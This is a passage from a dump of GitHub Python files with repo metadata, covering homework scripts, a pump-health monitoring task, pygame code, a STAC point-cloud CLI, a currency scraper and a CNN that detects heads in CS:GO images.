Turns out its a basic function ¯\\_(ツ)_/¯.\ndef kendallTauCalculation(a1, a2):\n return stats.kendalltau(a1, a2)\n\n#saveHtml()\ntf_idf('opportunity', idf(3170000000)) # Calculate tf-idf and output it.\n\n\ntfidf_values = [0.356, 0.288, 0.214, 0.214, 0.158, 0.151, 0.15, 0.124, 0.123, 0.114]\npage_rank = [9.2, 8.5, 8.7, 8.9, 8.5, 8.5, 8.5, 8.5, 8.5, 8.6]\nalexa = [1721, 814, 934, 1462, 814, 162, 814, 4914, 4914, 597] # https://www.rank2traffic.com/\nprint(\"FOR TFIDF AND PAGERANK\")\nprint(kendallTauCalculation(tfidf_values, page_rank))\n\nprint(\"FOR TFIDF AND alexa\")\nprint(kendallTauCalculation(tfidf_values, alexa))\n\nprint(\"FOR alexa AND PAGERANK\")\nprint(kendallTauCalculation(alexa, page_rank))\n\n\n\n\n\ntfidf_values = [0.967, 0.0579, 0.0126, 0.151, 0.022, 0.0234, 0.0196, 0.05, 0.0692, 0.03]\npage_rank = [9.5, 10.0, 8.5, 8.5, 7.5, 2.5, 3.7, 4.0, 8.9, 6.7]\nprint(\"FOR RANDOM\")\nprint(kendallTauCalculation(tfidf_values, page_rank))\n","repo_name":"TimothyBruce/anwala.github.io","sub_path":"cs532-s19/assignments/A3/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"22426520339","text":"\"\"\"\n该任务涉及插入表: MsetWarningLog,AssetHI\n涉及更新表:Asset\n\"\"\"\nimport datetime\n\nimport numpy as np\n\nfrom db import session_make\nfrom db.conn_engine import meta_engine\nfrom db_model import PumpUnit, AssetHI, MeasurePoint, MsetWarningLog, Asset\nfrom services.MSET.core import (\n Temp_MemMat,\n mset_estimate,\n calculate_similarity,\n threshold_caculate,\n)\n\n\ndef fetch_pumps(session):\n pumps = (\n session.query(\n PumpUnit.asset_id, PumpUnit.mset_model_path, Asset.name.label(\"name\")\n )\n .filter(PumpUnit.mset_model_path != None)\n .join(Asset, Asset.id == PumpUnit.asset_id)\n .all()\n )\n\n return pumps\n\n\ndef fetch_mps(session, asset_id):\n mps = (\n session.query(\n MeasurePoint.name, MeasurePoint.station_id, MeasurePoint.inner_station_id\n )\n .filter(MeasurePoint.asset_id == asset_id, MeasurePoint.type == 0)\n .order_by(MeasurePoint.inner_station_id)\n .all()\n )\n\n return mps\n\n\ndef fetch_base_data(session, cycle_number, base_mp, asset_id):\n data = session.execute(\n \"SELECT d.id as id, d.time as time, d.rms as rms \"\n \"from vib_data_{0}_{1} as d \"\n \"LEFT JOIN asset_hi_{2} as h on d.id = h.data_id \"\n \"where h.data_id is null \"\n \"order by d.id \"\n \"limit {3};\".format(\n base_mp.station_id, base_mp.inner_station_id, asset_id, cycle_number\n )\n )\n\n return data.fetchall()\n\n\ndef fetch_feature_matrix(session, base_data_list, mps):\n feature_matrix = []\n for base_data in base_data_list:\n feature_row = [base_data[\"rms\"]]\n for mp in mps[1:]:\n query = \"select rms from vib_data_{0}_{1} order by abs(datediff(time,'{2}')) limit 1\".format(\n mp.station_id, mp.inner_station_id, base_data[\"time\"]\n )\n res = session.execute(query)\n res = res.fetchall()\n feature_row.append(res[0][\"rms\"])\n feature_matrix.append(feature_row)\n feature_matrix = np.array(feature_matrix)\n return feature_matrix\n\n\ndef evaluate(path, feature_matrix):\n memory_mat = np.load(path)\n feature_matrix_max = memory_mat[-2, :]\n feature_matrix_min = memory_mat[-1, :]\n memory_mat = memory_mat[:-2, :]\n temp_memory_mat = Temp_MemMat(memory_mat)\n feature_matrix = (feature_matrix - feature_matrix_min) / (\n feature_matrix_max - feature_matrix_min\n )\n Kest = mset_estimate(\n memorymat=memory_mat, Kobs=feature_matrix, Temp=temp_memory_mat\n )\n\n sim = 
calculate_similarity(feature_matrix, Kest)\n    thres, warning_index = threshold_caculate(sim)\n    Kest = Kest * (feature_matrix_max - feature_matrix_min) + feature_matrix_min\n    return sim, thres, Kest, warning_index\n\n\ndef determine_statu(feature_matrix):\n    if feature_matrix[-1][0] < 0.2:\n        return 4\n    else:\n        x = []\n        for item in feature_matrix[-1]:\n            x.append(np.searchsorted([2.8, 7.1, 18], item))\n        return int(np.array(x).max())\n\n\ndef mset_evaluate(cycle_number):\n    estimate_count = 0\n    session = session_make(engine=meta_engine)\n    pumps = fetch_pumps(session)\n    for pump in pumps:\n\n        asset_hi_model = AssetHI.model(point_id=pump.asset_id)\n        mps = fetch_mps(session=session, asset_id=pump.asset_id)\n\n        if len(mps) > 0:\n            base_data_list = fetch_base_data(\n                session=session,\n                cycle_number=cycle_number,\n                base_mp=mps[0],\n                asset_id=pump.asset_id,\n            )\n            if len(base_data_list) == cycle_number:\n                feature_matrix = fetch_feature_matrix(\n                    session=session, base_data_list=base_data_list, mps=mps\n                )\n                sim, thres, Kest, warning_index = evaluate(\n                    path=pump.mset_model_path, feature_matrix=feature_matrix\n                )\n\n                evaluate_res_insert_value = []\n\n                for i in range(len(base_data_list)):\n\n                    evaluate_res_insert_value.append(\n                        asset_hi_model(\n                            health_indicator=float(sim[i][0] * 100),\n                            similarity=float(sim[i][0]),\n                            threshold=float(thres[i][0]),\n                            time=base_data_list[i][\"time\"],\n                            data_id=base_data_list[i][\"id\"],\n                            est={\n                                \"label\": [mp.name for mp in mps],\n                                \"raw\": feature_matrix[i].tolist(),\n                                \"est\": Kest[i].tolist(),\n                            },\n                        )\n                    )\n                try:\n                    for index, row in enumerate(evaluate_res_insert_value):\n\n                        session.add(row)\n                        session.commit()\n                        if len(warning_index) != 0:\n                            if index in warning_index:\n                                session.add(\n                                    MsetWarningLog(\n                                        cr_time=base_data_list[index][\"time\"],\n                                        description=mps[\n                                            np.argmax(\n                                                feature_matrix[index] - Kest[index]\n                                            )\n                                        ].name\n                                        + \"异常。\",\n                                        asset_id=pump.asset_id,\n                                        reporter_id=row.id,\n                                    )\n                                )\n                                session.commit()\n                    session.query(Asset).filter(Asset.id == pump.asset_id).update(\n                        {\n                            \"statu\": determine_statu(feature_matrix=feature_matrix),\n                            \"health_indicator\": evaluate_res_insert_value[\n                                -1\n                            ].health_indicator,\n                            \"md_time\": datetime.datetime.now(),\n                        }\n                    )\n                    session.commit()\n                    estimate_count += len(evaluate_res_insert_value)\n                except Exception as e:\n                    session.rollback()\n                    print(e)\n\n    session.close()\n\n    return estimate_count\n\n\nif __name__ == \"__main__\":\n    for i in range(15):\n        estimate_count = mset_evaluate(3)\n","repo_name":"peilion/OP-backend","sub_path":"tasks/mset_task.py","file_name":"mset_task.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"}
{"seq_id":"43142834560","text":"#coding=utf-8\nclass Person:\n    def greet(self):\n        self.age = 10;\n        print(\"hello ,world! I'm %s .\" % self.name);\n\np1 = Person();\np2 = Person();\np1.name=\"hl\";\np2.name=\"bb\";\np1.greet();\np2.greet();\np1.greet = lambda :print(\"hello\"); #\np1.greet();\np2.greet();\nprint(p1.age);\nprint(\".............................................\")\n\n\nfoo = lambda x:x+1;\nprint(foo(1));","repo_name":"scpahl/MyPythonCode","sub_path":"007-class/01-defineClass.py","file_name":"01-defineClass.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43650370168","text":"\"\"\"\nDuy Nguyen\n1/11/21\n\"\"\"\n\nimport pygame\n\n\nclass Button():\n    def __init__(self, x, y, image, scale, type):\n        # make sure to pass image in already loaded by pygame\n        self.type = type # 0 for button, 1 for label\n        self.x = x\n        self.y = y\n        self.scale = scale # scales button to desired size\n        self.width = image.get_width()\n        self.height = image.get_height()\n        self.image = pygame.transform.scale(image, (int(self.width * scale), int(self.height * scale)))\n        # button gets bigger when hovered over\n        self.scaledImage = pygame.transform.scale(self.image, (int(self.width * self.scale * 1.1), int(self.height * self.scale * 1.1)))\n        self.rect = self.image.get_rect()\n        self.rect.topleft = (x,y)\n        self.clicked = False\n\n    def update(self, win):\n        # if clickable button\n        if self.type == 0:\n            action = False # turns on when clicked. calls for an action\n\n            pos = pygame.mouse.get_pos() #position of mouse\n\n            if self.rect.collidepoint(pos):\n                # button gets bigger when hovered over\n                # compensate coordinates for bigger button\n                self.rect.x = self.x + int((self.image.get_width() - self.image.get_width() * 1.1) / 2)\n                self.rect.y = self.y + int((self.image.get_height() - self.image.get_height() * 1.1) / 2)\n                image = self.scaledImage\n\n                if pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n                    self.clicked = True\n                    action = True\n            else:\n                image = self.image\n                self.rect.topleft = (self.x, self.y)\n\n            if pygame.mouse.get_pressed()[0] == 0:\n                self.clicked = False\n\n            # draws button\n            win.blit(image, (self.rect.x, self.rect.y))\n\n            # returns whether the button was clicked or not\n            return action\n\n        # if just a label\n        else:\n            win.blit(self.image, (self.rect.x, self.rect.y))\n\n","repo_name":"Duweee/Sprite-Survival","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"37241910602","text":"# A Linked list keeps the items\n# of the Node class.\nclass Node:\n    def __init__(self, value):\n        self.value = value\n        self.next = None\n    def append(self, new_node):\n        self.next = new_node\n\n# Create a linked list of 5 items.\nhead = Node(10) # The head of the list\ncurr = head\nfor n in range(20, 60, 10):\n    new_node = Node(n)\n    curr.append(new_node)\n    curr = new_node\n\n# Print the items in the linked list.\ncurr = head\nwhile curr:\n    print(curr.value, '-> ', end='')\n    curr = curr.next\nprint('END')\n\n# Output:\n# 10 -> 20 -> 30 -> 40 -> 50 -> END\n","repo_name":"ash/amazing_python3","sub_path":"tasks/t-010.py","file_name":"t-010.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"}
{"seq_id":"73529545427","text":"#!/usr/bin/env python\n\"\"\"\nWrapper file for plotting function\n\nAuthors: Kostis SZ, Romina Ariazza and Clara Tump\n\"\"\"\n\nfrom matplotlib import pyplot as plt\n\n\ndef 
plot_2d_function(x, y, y_pred=None, title=None):\n plt.scatter(x, y, color='blue')\n\n if y_pred is not None:\n plt.scatter(x, y_pred, color='red')\n\n plt.title(title)\n plt.show()\n\n\ndef plot_2d_function_multiple(x, y, y_pred, title=None):\n plt.plot(x, y, color='blue')\n\n for y_p in y_pred:\n plt.plot(x, y_p)\n\n plt.title(title)\n plt.show()\n\n\ndef plot_errors(x, y, title=None):\n plt.figure()\n plt.errorbar(x, y, fmt='o')\n labels = [str(i) for i in x]\n plt.xticks(x, labels)\n plt.title(title)\n plt.show()\n","repo_name":"clara2911/ANNProject","sub_path":"Tutorial 2/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36658904147","text":"#Command to run on terminal in the smai_proj folder:\n#python3 perpronperemail.py ./clean_enron/ > perpronperemail.txt\n\nimport sys\nimport os\nimport nltk\n\nclasses = ['Benjamin_Rogers','Chris_Dorland','Drew_Fossum','Jeffrey_Shankman','Kevin_Presto','Kimberly_Watson','Lynn_Blair','Mark_Haedicke','Michelle_Cash', 'Phillip_Allen']\n#classes = ['Benjamin_Rogers']\n#print len(classes)\n\ndirec = sys.argv[1]\n#direc = \"./clean_enron/\"\n\nfor c in classes:\n\tlisting = os.listdir(direc+c)\n\t#numemail = len(listing)\n\t#count = 0\n\tfor filename in listing:\n\t\tf = open(direc+c+'/'+filename, 'r')\n\t\ttext = f.read()\n\t\ttok = nltk.word_tokenize(text)\n\t\tpostag = nltk.pos_tag(tok)\n\t\tcount = 0\n\t\tfor i in range(len(postag)):\n\t\t\tif postag[i][1] == \"PRP\":\n\t\t\t\tcount = count + 1\n\t\tprint(c+','+filename+','+str(count))\n\t\tf.close()\n\n","repo_name":"IamAdiSri/auth-id","sub_path":"feature_extraction_scripts/perpronperemail.py","file_name":"perpronperemail.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"26961268538","text":"import json\nimport logging\nimport os\n\nimport click\nimport pystac\nfrom click import Command, Group\n\nfrom stactools.canelevation.constants import METADATA_URL\nfrom stactools.canelevation.stac import create_collection, create_item\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_canelevation_command(cli: Group) -> Command:\n \"\"\"Creates a command group for commands working with\n canelevations.\n \"\"\"\n\n @cli.group(\n \"canelevation\",\n short_help=(\"Commands for working with \" \"CanElevation point clouds.\"),\n )\n def canelevation() -> None:\n pass\n\n @canelevation.command(\n \"create-collection\",\n short_help=\"Creates a STAC collection from NRCan CanElevation\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC Collection json\",\n )\n @click.option(\n \"-m\", \"--metadata\", help=\"URL to the NRCan metadata json\", default=METADATA_URL\n )\n def create_collection_command(destination: str, metadata: str) -> None:\n \"\"\"Creates a STAC Collection from NRCan Land Use CanElevation metadata\n\n Args:\n destination (str): Directory to create the collection json\n metadata (str, optional): Path to json metadata file - provided by NRCan\n\n Returns:\n Callable\n \"\"\"\n # Collect the metadata as a dict and create the collection\n collection = create_collection(metadata)\n\n # Set the destination\n output_path = os.path.join(destination, \"collection.json\")\n collection.set_self_href(output_path)\n collection.normalize_hrefs(destination)\n\n # Save and validate\n collection.save()\n 
collection.validate()\n\n @canelevation.command(\n \"create-item\", short_help=\"Create a STAC Item from a las or laz file\"\n )\n @click.argument(\"href\")\n @click.argument(\"dst\")\n @click.option(\"-r\", \"--reader\", help=\"Override the default PDAL reader.\")\n @click.option(\n \"-q\", \"--quick\", is_flag=True, help=\"Do a quick look at the COPC data.\"\n )\n @click.option(\n \"-t\",\n \"--pointcloud-type\",\n default=\"lidar\",\n help=\"Set the pointcloud type (default: lidar)\",\n )\n @click.option(\n \"--compute-statistics/--no-compute-statistics\",\n default=False,\n help=\"Compute statistics for the pointcloud (could take a while)\",\n )\n @click.option(\n \"-p\",\n \"--providers\",\n help=\"Path to JSON file containing array of additional providers\",\n )\n def create_item_command(\n href: str,\n dst: str,\n reader: str,\n pointcloud_type: str,\n compute_statistics: bool,\n providers: str,\n quick: bool,\n ) -> None:\n \"\"\"Creates a STAC Item based on the header of a pointcloud.\n\n HREF is the pointcloud file.\n DST is directory that a STAC Item JSON file will be created\n in.\n \"\"\"\n additional_providers = None\n if providers:\n with open(providers) as f:\n additional_providers = [\n pystac.Provider.from_dict(d) for d in json.load(f)\n ]\n\n item = create_item(\n href,\n pdal_reader=reader,\n compute_statistics=compute_statistics,\n pointcloud_type=pointcloud_type,\n additional_providers=additional_providers,\n quick=quick,\n )\n\n item_path = os.path.join(dst, \"{}.json\".format(item.id))\n item.set_self_href(item_path)\n item.make_asset_hrefs_relative()\n item.save_object()\n item.validate()\n\n return canelevation\n","repo_name":"stactools-packages/canelevation","sub_path":"src/stactools/canelevation/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17463698987","text":"def carga_inicial(): \n \n from bs4 import BeautifulSoup\n import pandas as pd\n import requests\n import re\n \n \n \n web = 'https://dolarhoy.com/'\n response = requests.get(web)\n content = response.text\n \n soup = BeautifulSoup(content, 'html.parser')\n \n dolares = soup.find('div', class_=\"tile is-parent is-7 is-vertical\")\n dolares = (dolares).get_text()\n \n fecha = soup.find('div', class_=\"tile update\")\n fecha = (fecha).get_text()\n \n dolares_split = dolares.split(\" \")\n dolares_list = dolares_split\n \n \n def captura_compra(tipo_dolar):\n result = re.search(\"compra(.*?)venta\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar = result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta(tipo_dolar):\n result = re.search(\"Venta(.*?)Dólar\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta_1(tipo_dolar):\n result = re.search(\"Venta(.*?)Contado\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_venta_2(tipo_dolar):\n result = re.search(\"Venta(.*?)Publicá\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n tipo_dolar = float(tipo_dolar.replace('$', \"\")) \n return tipo_dolar\n \n def captura_fecha(tipo_dolar):\n result = re.search(\"el(.*?)m\", tipo_dolar, re.DOTALL | re.IGNORECASE)\n tipo_dolar= result.group(1)\n return tipo_dolar\n \n # 
Creation of purchase values\n    blue_compra = captura_compra(dolares_list[1])\n    oficial_compra = captura_compra(dolares_list[3])\n    bolsa_compra = captura_compra(dolares_list[4])\n    contado_liqui_compra = captura_compra(dolares_list[6])\n    crypto_compra = captura_compra(dolares_list[7])\n\n    # Creation of sale values\n    blue_venta = captura_venta(dolares_list[1])\n    oficial_venta = captura_venta(dolares_list[3])\n    bolsa_venta = captura_venta_1(dolares_list[4])\n    contado_liqui_venta = captura_venta(dolares_list[6])\n    crypto_venta = captura_venta(dolares_list[7])\n    solidario_venta = captura_venta_2(dolares_list[8])\n    \n    # Date cleanup\n    fecha = captura_fecha(fecha)\n    fecha_split = fecha.split( )\n    fecha = fecha_split[0]\n    hora = fecha_split[1]\n    am_pm = fecha_split[2]\n\n    return fecha, hora, am_pm, blue_compra, oficial_compra, bolsa_compra, contado_liqui_compra, crypto_compra, blue_venta, oficial_venta, bolsa_venta, contado_liqui_venta, crypto_venta, solidario_venta\n","repo_name":"emirigueiro/Dev-R","sub_path":"Inflation_library/ETL_Dolar.py","file_name":"ETL_Dolar.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41895349668","text":"import torch \r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport matplotlib.pyplot as plt\r\nimport torchvision.transforms as transforms\r\nfrom PIL import Image\r\nfrom numpy import loadtxt\r\nimport torch.optim as optim\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n#init\r\nepochs = 30\r\nlr = 0.01\r\ndataset_size = 1746\r\nbatch_size = 10\r\nn_features = 100\r\ninput_chanels = 1\r\nload_m = False\r\nmodel_path = "models\\\\model_test.pth.tar"\r\n\r\ndataset_path = "D:\\\\Datasets\\\\Head_hunt\\\\"\r\ntraining_dataset = []\r\nvalidation_dataset = []\r\nvalidation_labels = []\r\ntraining_labels = []\r\n\r\ndef save_mod(state, filename = model_path):\r\n\ttorch.save(state, filename)\r\n\r\ndef load_mod(checkpoint):\r\n\tmodel.load_state_dict(checkpoint['state_dictionary'])\r\n\toptimizer.load_state_dict(checkpoint['optimizer'])\r\n\r\ndef im_convert(tensor):\r\n\timage = tensor.cpu().clone().detach().numpy()\r\n\t#clone tensor --> detach it from computations --> transform to numpy\r\n\t#image = image.squeeze()\r\n\t#image = image.transpose(1, 2, 0)\r\n\t# swap axis from(1,28,28) --> (28,28,1)\r\n\t#image = image * np.array((0.5, 0.5, 0.5)) + np.array((0.5, 0.5, 0.5))\r\n\t#denormalize image\r\n\t#image = image.clip(0, 1)\r\n\t#sets image range from 0 to 1\r\n\treturn image\r\n\r\n# load array\r\nlabels = loadtxt('data.csv', delimiter=',')\r\n\r\n# print the array\r\nprint(\"converting labels...\", end = \"\\r\")\r\n\r\nfor idx, i in enumerate(labels):\r\n\tif i[2] == -1:\r\n\t\ti[0], i[1], i[2] = -0.9, -0.9, -0.9\r\n\telse:\r\n\t\tlabels[idx][2] = 112.0 \r\n\t\tlabels[idx] = labels[idx]/112.0\r\n\r\n\r\n\r\n\r\nprint(\"labels_converted...\", end = \"\\r\")\r\n\r\n#dataloading\r\nraw_data = [Image.open(dataset_path + \"head (\" + str(i) + \").png\" ).convert(\"L\") for i in range(1, dataset_size)]\r\n\r\ntransform_train = transforms.Compose([transforms.ToTensor(),\r\n\t\t\t\t\t\t\t\t\t transforms.Normalize((0.5,),\r\n\t\t\t\t\t\t\t\t\t \t\t\t\t\t (0.5,))\r\n\t\t\t\t\t\t\t\t\t ])\r\n\r\nprint(\"converting images...\", end = \"\\r\")\r\n\r\nfor idx, img in enumerate(raw_data):\r\n\tif idx % 20 == 
0:\r\n\t\tvalidation_dataset.append(transform_train(img))\r\n\t\tvalidation_labels.append(labels[idx])\r\n\telse:\r\n\t\ttraining_dataset.append(transform_train(img))\r\n\t\ttraining_labels.append(labels[idx])\r\n\r\n\r\n\r\n#plt.imshow(im_convert(training_dataset[1][0]))\r\n#plt.show()\r\n\r\nraw_data = None\r\nlabels = None\r\n\r\ntraining_labels = torch.from_numpy(np.array(training_labels)).double()\r\nvalidation_labels = torch.from_numpy(np.array(validation_labels)).double()\r\n\r\nprint(\"images_converted...\", end = \"\\r\")\r\n\r\ntraining_dataset = torch.stack(training_dataset)\r\nvalidation_dataset = torch.stack(validation_dataset) \r\nprint(validation_dataset.shape)\r\n\r\n#print(type(validation_labels))\r\n\r\ntraining_dataset = torch.utils.data.TensorDataset(training_dataset, training_labels)\r\nvalidation_dataset = torch.utils.data.TensorDataset(validation_dataset, validation_labels) \r\n\r\ntraining_loader = torch.utils.data.DataLoader(training_dataset, batch_size = batch_size, shuffle = True)\r\nvalidation_loader = torch.utils.data.DataLoader(validation_dataset, batch_size = batch_size, shuffle = False)\r\n\r\n#neural_network_init\r\n\r\nclass Head_hunter(nn.Module):\r\n\tdef __init__(self, n_features, input_chanels, batch_size):\r\n\t\tsuper().__init__()\r\n\t\tself.conv1 = nn.Conv2d(input_chanels, n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.conv2 = nn.Conv2d(n_features, n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.conv3 = nn.Conv2d(n_features, n_features, kernel_size = 5, stride = 1, padding = 2)\r\n\t\tself.dropout1 = nn.Dropout(0.5)\r\n\t\tself.linear1 = nn.Linear(112*112*n_features, 100)\r\n\t\tself.linear2 = nn.Linear(100, 3)\r\n\t\t#x, y, probability\r\n\t\r\n\tdef forward(self, x):\r\n\t\tx = F.relu(self.conv1(x))\r\n\t\tx = F.relu(self.conv2(x))\r\n\t\tx = F.relu(self.conv3(x))\r\n\t\tx = x.view(-1, 112*112*n_features)\r\n\t\tx = F.tanh(self.linear1(x))\r\n\t\t#print(x)\r\n\t\t#print(x.shape)\r\n\t\tx = self.dropout1(x) \r\n\t\tx = F.tanh(self.linear2(x))\r\n\t\t#x[:, 2] = (x[:, 2]*2) - 1\r\n\t\t#print(x)\r\n\t\treturn x\r\n\r\nprint(\"initializing_model...\", end = \"\\r\")\r\n\r\n#criterion = nn.BCEWithLogitsLoss() \r\ncriterion = nn.MSELoss(reduce = \"sum\")\r\nmodel = Head_hunter(n_features, input_chanels, batch_size).to(device)\r\nparameters = model.parameters()\r\noptimizer = optim.Adam(parameters, lr = lr)\r\n\r\nprint(\"starting_training...\", end = \"\\r\")\r\n\r\nif load_m:\r\n\tload_mod(torch.load(model_path))\r\n\r\n\r\nfor epoch in range(epochs):\r\n\trunning_loss = 0.0\r\n\tcheckpoint = {'state_dictionary' : model.state_dict(), 'optimizer': optimizer.state_dict()}\r\n\tif epoch % 5 == 0:\r\n\t\tsave_mod(checkpoint)\r\n\tfor idx, [image, label] in enumerate(training_loader):\r\n\t\t#print(image.shape)\r\n\r\n\t\timage = image.to(device)\r\n\t\tlabel = label.to(device)\r\n\r\n\t\toutput = model(image).double().to(device)\r\n\r\n\t\tloss = criterion(output, label)\r\n\r\n\t\trunning_loss += loss.item()\r\n\t\tprint(\"epoch: \", epoch, \" iter: \", idx, \" loss: \", running_loss/(idx+1), end = \"\\r\")\r\n\t\t\r\n\t\tloss.backward()\r\n\t\toptimizer.step()\r\n\t\toptimizer.zero_grad()\r\n\r\n\tif epoch % 5 == 0:\r\n\t\tvalidation_loss = 0.0\r\n\t\twith torch.no_grad():\r\n\t\t\tfor idx, [val_img, label] in enumerate(validation_loader):\r\n\r\n\t\t\t\tval_img = val_img.to(device)\r\n\t\t\t\t#print(val_img.shape)\r\n\t\t\t\tlabel = label.to(device)\r\n\r\n\t\t\t\toutput = model(val_img)\r\n\t\t\t\tloss = 
criterion(output, label)\r\n\t\t\t\tvalidation_loss += loss.item()\r\n\r\n\t\t\tprint(\"validation_iter: \", idx, \" validation_loss: \", validation_loss/(idx+1))\r\n\r\n\r\nimg = Image.open(dataset_path + \"head (\" + str(182) + \").png\" ).convert(\"L\")\r\nimg = transform_train(img)\r\nimg = img.unsqueeze(0)\r\nplt.imshow(img[0][0])\r\nplt.show()\r\n\r\noutput = model(image).double().to(device)\r\nprint(output*112)\t\t\r\n\t\t\r\n\r\n","repo_name":"BoykoDenis/CSGOAI-head-detector","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15210783704","text":"student=[\n{\"name\": \"Joseph\",\"score\":85},\n{\"name\": \"James\",\"score\":70},\n{\"name\": \"Mary\",\"score\":90},\n{\"name\": \"Tony\",\"score\":65},\n{\"name\": \"Tuu\",\"score\":49},\n{\"name\": \"Pom\",\"score\":51},\n]\nfor i in student:\n if i[\"score\"] >=80:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade4\")\n elif i[\"score\"]>=70:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade3\")\n elif i[\"score\"]>=60:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade2\")\n elif i[\"score\"]>=50:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade1\")\n elif i[\"score\"]<50:\n for key,vale in i.items():\n print(key,vale)\n print(\"grade0\")\n#ชวิศ กานต์ขจรเดช 6/14 เลขที่ 24 ","repo_name":"kusdsv/python14","sub_path":"data-loop.py","file_name":"data-loop.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34953387724","text":"import math\n\ndef func(tar, a):\n for i, l in enumerate(a):\n expe = int(math.sqrt(tar**2 - l**2))\n b = a[i+1:]\n if expe in b:\n return tar + l + b[b.index(expe)]\n \n return 0\n\nn = 4\na = [4, 5, 10, 20]\n\n#昇順にソート\na.sort(reverse=True)\n#上から見ていく\nfor i,tar in enumerate(a):\n res = func(tar, a[i+1:])\n if res != 0:\n break\n\nprint(res)","repo_name":"ririron/pgccb","sub_path":"ch1/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15982921235","text":"'''\nSpaceship pygame\nAuthor: Caleb Han\n'''\n\n# imports\nimport pygame\nimport random\n\n# get keystrokoes\nfrom pygame.locals import (\n K_UP,\n K_DOWN,\n K_LEFT,\n K_RIGHT,\n K_ESCAPE,\n KEYDOWN,\n QUIT,\n)\n\n# set up screen\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n# set up player class\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n super(Player, self).__init__()\n self.surf = pygame.Surface((75, 25))\n self.surf.fill((225, 225, 225))\n self.rect = self.surf.get_rect()\n \n # move the player\n def update(self, pressed_keys):\n if pressed_keys[K_UP]:\n self.rect.move_ip(0, -1)\n if pressed_keys[K_DOWN]:\n self.rect.move_ip(0, 1)\n if pressed_keys[K_LEFT]:\n self.rect.move_ip(-1, 0)\n if pressed_keys[K_RIGHT]:\n self.rect.move_ip(1, 0)\n\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right = SCREEN_WIDTH\n if self.rect.top <= 0:\n self.rect.top = 0\n if self.rect.bottom >= SCREEN_HEIGHT:\n self.rect.bottom = SCREEN_HEIGHT\n\n# set up enemy class\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self):\n super(Enemy, self).__init__()\n self.surf = pygame.Surface((20, 10))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n 
random.randint(SCREEN_WIDTH + 20, SCREEN_WIDTH + 100),\n                random.randint(0, SCREEN_HEIGHT),\n            )\n        )\n        self.speed = random.randint(5, 20)\n\n    # move enemy\n    def update(self):\n        self.rect.move_ip(-self.speed, 0)\n        if self.rect.right < 0:\n            self.kill()\n\n# run game\npygame.init()\n\n# set up a clock\nclock = pygame.time.Clock()\n\n# set up the screen\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n# add an enemy\nADDENEMY = pygame.USEREVENT + 1\npygame.time.set_timer(ADDENEMY, 250)\n\n# add player\nplayer = Player()\n\n# set up variables\nenemies = pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\nall_sprites.add(player)\n\n# get main running loop\nrunning = True\nwhile running:\n    # quit game or add enemy events\n    for event in pygame.event.get():\n        if event.type == KEYDOWN:\n            if event.key == K_ESCAPE:\n                running = False\n        elif event.type == QUIT:\n            running = False\n\n        elif event.type == ADDENEMY:\n            new_enemy = Enemy()\n            enemies.add(new_enemy)\n            all_sprites.add(new_enemy)\n\n    # get pressed keys and move\n    pressed_keys = 